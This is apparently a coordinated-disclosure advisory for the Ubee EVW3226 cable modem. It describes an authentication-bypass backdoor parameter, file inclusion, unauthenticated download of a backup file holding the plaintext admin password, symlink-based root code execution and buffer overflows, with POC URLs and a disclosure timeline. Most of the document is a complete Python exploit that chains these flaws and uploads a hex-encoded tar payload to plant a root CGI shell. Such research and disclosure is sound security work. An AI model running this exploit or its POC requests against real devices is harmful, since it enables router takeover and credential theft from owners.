1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305 | '''
Ubee EVW3226 modem/router multiple vulnerabilities
--------------------------------------------------
Platforms / Firmware confirmed affected:
- Ubee EVW3226, 1.0.20
- Product page: http://www.ubeeinteractive.com/products/cable/evw3226
Vulnerabilities
---------------
Insecure session management
The web interface does not use cookies at all. If admin login is
successful, the IP address of the admin user is stored and everybody can
access the management interface with the same IP.
Local file inclusion
Setup.cgi can read any file with .htm extension using directory
traversal in the gonext parameter. Although the file must have htm
extension, the local file inclusion can be used to map directories,
because the response is different depending on whether directory exists
or not.
POC:
http://<device_ip>/cgi-bin/setup.cgi?gonext=../www/main2
Backup file is not encrypted
Although the web interface requires a password for encrypting the backup
file, the encryption is not performed. In order to backup file password,
the plain password is stored in the backup file, which is a standard tgz
(gzipped tar) file with a simple header.
Backup file disclosure
When a user requests a backup file, the file is copied into www root in
order to make download possible. However, the backup file is not removed
from the www root after download. Since there is not any session check
required to download the backup file, an attacker is able to download it
without authentication from LAN until the next reboot.
Since the backup file is not encrypted and contains the plain admin
password, the router can be compromised from LAN.
POC:
http://<device_ip>/Configuration_file.cfg
Authentication bypass (backdoor)
The web interface bypasses authentication if the HTML request contains
the factoryBypass parameter. In this case a valid session is created and
the attacker can gain full control over the device.
POC:
http://<device_ip>/cgi-bin/setup.cgi?factoryBypass=1
Arbitrary code execution
The configuration file restore function receives a compressed tar file,
which is extracted to the /tmp folder. Tar files may contain symbolic
links, which can link out from the extraction folder. By creating a
configuration file with a symbolic link and a folder which uses this
link, the attacker can write out from the backup folder and can
overwrite any file in the writable file-system.
Since www is copied to the writable file system at boot time (under
/tmp), the attacker can insert a new cgi script that executes arbitrary
code with root privileges.
Default SSID and passphrase can be calculated
The default SSID and passphrase are derived only from the MAC address.
Since the MAC address of the device is broadcasted via WiFi, the default
password can be calculated easily.
Combined with code execution and factory bypass, even a botnet of Ubee
routers can be deployed easily.
Buffer overflow in configuration restore
During the configuration restore process, the backup file password is
read from the pass.txt file. If the password is large enough (larger
than 65536), a stack based buffer overflow is caused, because the file
content is loaded with fscanf(ā%sā) to a stack based local variable. The
stack based buffer overflow can be used to execute arbitrary code with
root privileges.
Buffer overflow in configuration file request
The web interface identifies the configuration file download request by
checking that the URL contains the Configuration_file.cfg string. If
this string is found, the whole URL is copied into a stack based buffer,
which can cause a buffer overflow. This stack based buffer overflow can
be used to execute arbitrary code with root privileges without
authentication.
POC:
http://192.168.0.1/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaConfiguration_file.cfg
Buffer overflow in next file name
The gonext variable in the POST requests specifies the HTML file, which
the cgi script should be loaded. If the gonext variable is large enough
(larger than 6512 bytes), a stack based buffer overflow is caused, which
can be used to execute arbitrary code with root privileges without
authentication.
Communication on the UPC Wi-Free can be sniffed within the device
The UPC Wi-Free communication is not separated correctly inside the
device, because the whole communication can be sniffed after gaining
root access to the device.
Timeline
--------
- 2015.06.24: Presenting the Ubee router problems to the CTO of UPC Magyarorszag
- 2015.07.16: UPC contacted Ubee and required some more proof about some specific problems
- 2015.07.16: Proofs, that the default passphrase calculation of the Ubee router was broken, were sent to UPC
- 2015.07.20: UPC requested the POC code
- 2015.07.21: POC code was sent to UPC
- 2015.07.30: We sent some new issues affecting the Ubee router and other findings in Technicolor TC7200 and Cisco EPC3925 devices to UPC
- Between 2015.07.31 and 08.12 there were several e-mail and phone communications between technical persons from Liberty Global to clarify the findings
- 2015.08.19: UPC sent out advisory emails to its end users to change the default WiFi passphrase
- 2015.09.16: Ubee Interactive also asked some questions about the vulnerabilities
- 2015.09.24: We sent detailed answers to Ubee Interactive
- 2016.01.27: UPC Magyarorszag send out a repeated warning to its end users about the importance of the change of the default passphrases.
- 2016.02.16: Face to face meeting with Liberty Global security personnel in Amsterdam headquarters
- 2016.02.18: A proposal was sent to Liberty Global suggesting a wardriving experiment in Budapest, Hungary to measure the rate of end users who are still using the default passphrases.
POC
---
POC script is available to demonstrate the following problems [3]:
- Authentication bypass
- Unauthenticated backup file access
- Backup file password disclosure
- Code execution
Video demonstration is also available [1], which presents the above problems and how these can be combined to obtain full access to the modem.
Recommendations
---------------
Since only the ISP can update the firmware, we can recommend for users to change the WiFi passphrase.
Credits
-------
This vulnerability was discovered and researched by Gergely Eberhardt from SEARCH-LAB Ltd. (www.search-lab.hu)
References
----------
[1] http://www.search-lab.hu/advisories/secadv-20160720
[2] https://youtu.be/cBclw7uUuO4
[3] https://github.com/ebux/Cable-modems/tree/master/Ubee
'''
#
# POC code for Ubee EVW3226
#
# Demonstrates the following vulnerabilities
# - Authentication bypass
# - Unauthenticated backup file access
# - Backup file password disclosure
# - Code execution
#
# Credit: Gergely Eberhardt (@ebux25) from SEARCH-LAB Ltd. (www.search-lab.hu)
#
# Advisory: http://www.search-lab.hu/advisories/secadv-20150720
import sys
import requests
import tarfile
import struct
import binascii
import re
import shutil
config_data = binascii.unhexlify('00003226FFA486BE000001151F8B0808EB7D4D570400706F635F636F6E666967'
'2E74617200EDD53D4FC3301006E09BF32BDC30A78E9D3816AC8811898185D104'
'8B4404C7CA1DA4FC7B121A900A0296A66A153FCBF96BB15F9D8C0DCC2E1D68AD'
'87FA61A7EE8E65AEB48254C86C38CE247F351DA767CFFBBEE7308F1724D33106'
'5DDBD21FC7FEDD3F51DE20AE6933EBD5C6648B3CFF3D7F21BEE52F649E014BE1'
'00169EFFD5F5CDED9DC88A730896081B5E3ED6C97DED3859A43556B077DBF667'
'3FD6BFDA5F291052CB4CEA421502C6DF221707EEFF853A5BF1317BAC225B562D'
'BB6C1D594709BD797BC1C86E88FBC6D46EBB1BC753AD4CF9641F1836AB389A96'
'3C8A38F2F83975968687A5389A062C712682200882E058BC0383AF448C000E0000')
class ubee:
def __init__(self, addr, port):
self.addr = addr
self.port = port
self.s = requests.Session()
def getUri(self, uri):
return 'http://%s:%d/%s'%(self.addr,self.port,uri)
def authenticationBypass(self):
self.s.get(self.getUri('cgi-bin/setup.cgi?factoryBypass=1'))
self.s.get(self.getUri('cgi-bin/setup.cgi?gonext=main2'))
def parseNVRam(self, nv):
o = 0x1c
pos = 2
nvdata = {}
while(True):
stype = struct.unpack('!H', nv[o:o+2])[0]
slen = struct.unpack('!H', nv[o+2:o+4])[0]
sval = nv[o+4:o+4+slen]
nvdata[stype] = sval
pos += slen
o = o+slen+4
if (o >= len(nv) ):
break
return nvdata
def parseBackupFile(self, fname):
tar = tarfile.open("Configuration_file.cfg", "r:gz")
for tarinfo in tar:
if tarinfo.isreg():
if (tarinfo.name == 'pass.txt'):
print 'config file password: %s'%(tar.extractfile(tarinfo).read())
elif (tarinfo.name == '1'):
nvdata = self.parseNVRam(tar.extractfile(tarinfo).read())
print 'admin password: %s'%(nvdata[3])
tar.close()
def saveBackup(self, r, fname):
if r.status_code == 200:
resp = ''
for chunk in r:
resp += chunk
open(fname, 'wb').write(resp[0xc:])
def createBackupFile(self, fname):
# get validcode (CSRF token)
r = self.s.get(self.getUri('cgi-bin/setup.cgi?gonext=RgSystemBackupAndRecoveryBackup'))
m = re.search('ValidCode = "([^"]+)"', r.text)
if (m == None):
print 'ValidCode is not found'
return
validCode = m.group(1)
# create backup file
r = self.s.get(self.getUri('cgi-bin/setup.cgi?gonext=Configuration_file.cfg&Password=secretpass&ValidCode=%s')%(validCode))
if (len(r.text) > 0):
self.saveBackup(r, fname)
def downloadBackupFile(self, fname):
r = self.s.get(self.getUri('Configuration_file.cfg'))
if (len(r.text) > 0):
print len(r.text)
self.saveBackup(r, fname)
return True
return False
def restoreConfigFile(self, fname = '', passwd = 'badpasswd'):
# get validcode (CSRF token)
r = self.s.get(self.getUri('cgi-bin/setup.cgi?gonext=RgSystemBackupAndRecoveryRestore'))
m = re.search('name="ValidCode" value="([^"]+)"', r.text)
if (m == None):
print 'ValidCode is not found'
return
validCode = m.group(1)
# restore config file
if (fname == ''):
cfg_data = config_data
else:
cfg_data = open(fname, 'rb').read()
r = self.s.post(self.getUri('cgi-bin/restore.cgi'), files=(('ValidCode', (None, validCode)), ('PasswordStr', (None, passwd)), ('browse', cfg_data), ('file_name', (None, 'Configuration_file.cfg'))))
if (r.text.find('alert("Password Failure!")') > 0):
return True
else:
return False
def getShellResponse(self):
r = self.s.get(self.getUri('cgi-bin/test.sh'))
print r.text
#------------------------------------
if (len(sys.argv) < 2):
print 'ubee_evw3226_poc.py addr [port]'
addr = sys.argv[1]
port = 80
if (len(sys.argv) == 3):
port = int(sys.argv[2])
# create ubee object
u = ubee(addr, port)
# perform authentication bypass
u.authenticationBypass()
# download backup file if it is exists (auth is not required)
if (not u.downloadBackupFile('Configuration_file.cfg')):
# create and download backup file (auth required)
u.createBackupFile('Configuration_file.cfg')
# parse downloaded file and get admin and backup file password
u.parseBackupFile('Configuration_file.cfg')
# execute shell command in the router
if (u.restoreConfigFile()):
print 'Shell installed'
u.getShellResponse()
else:
print 'Shell install failed'
|
